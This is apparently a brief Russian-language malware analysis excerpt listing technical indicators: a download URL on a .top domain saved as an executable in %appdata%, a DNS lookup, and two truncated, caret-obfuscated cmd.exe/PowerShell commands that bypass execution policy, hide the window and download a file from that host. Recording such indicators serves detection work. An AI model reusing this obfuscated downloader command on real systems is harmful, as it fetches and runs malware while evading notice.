Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^Wer^SHeLL^.^E^X^E -^e^XEcut^IoNpOl^i^cY ^B^YPa^sS -n^o^pRofIl^E -^WInd^OwSTYLe^ h^id^D^E^N^ ^(^NeW-^o^BjEc^t^ S^y^St^Em.^neT^.^wE^b^cliEnt)^.^dO^WNloA^d^F^I^l^e^('http://tr...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /c "p^o^Wer^SHeLL^.^E^X^E -^e^XEcut^IoNpOl^i^cY ^B^YPa^sS -n^o^pRofIl^E -^WInd^OwSTYLe^ h^id^D^E^N^ ^(^NeW-^o^BjEc^t^ S^y^St^Em.^neT^.^wE^b^cliEnt)^.^dO^WNloA^d^F^I^l^e^('http://tr...' (со скрытым окном)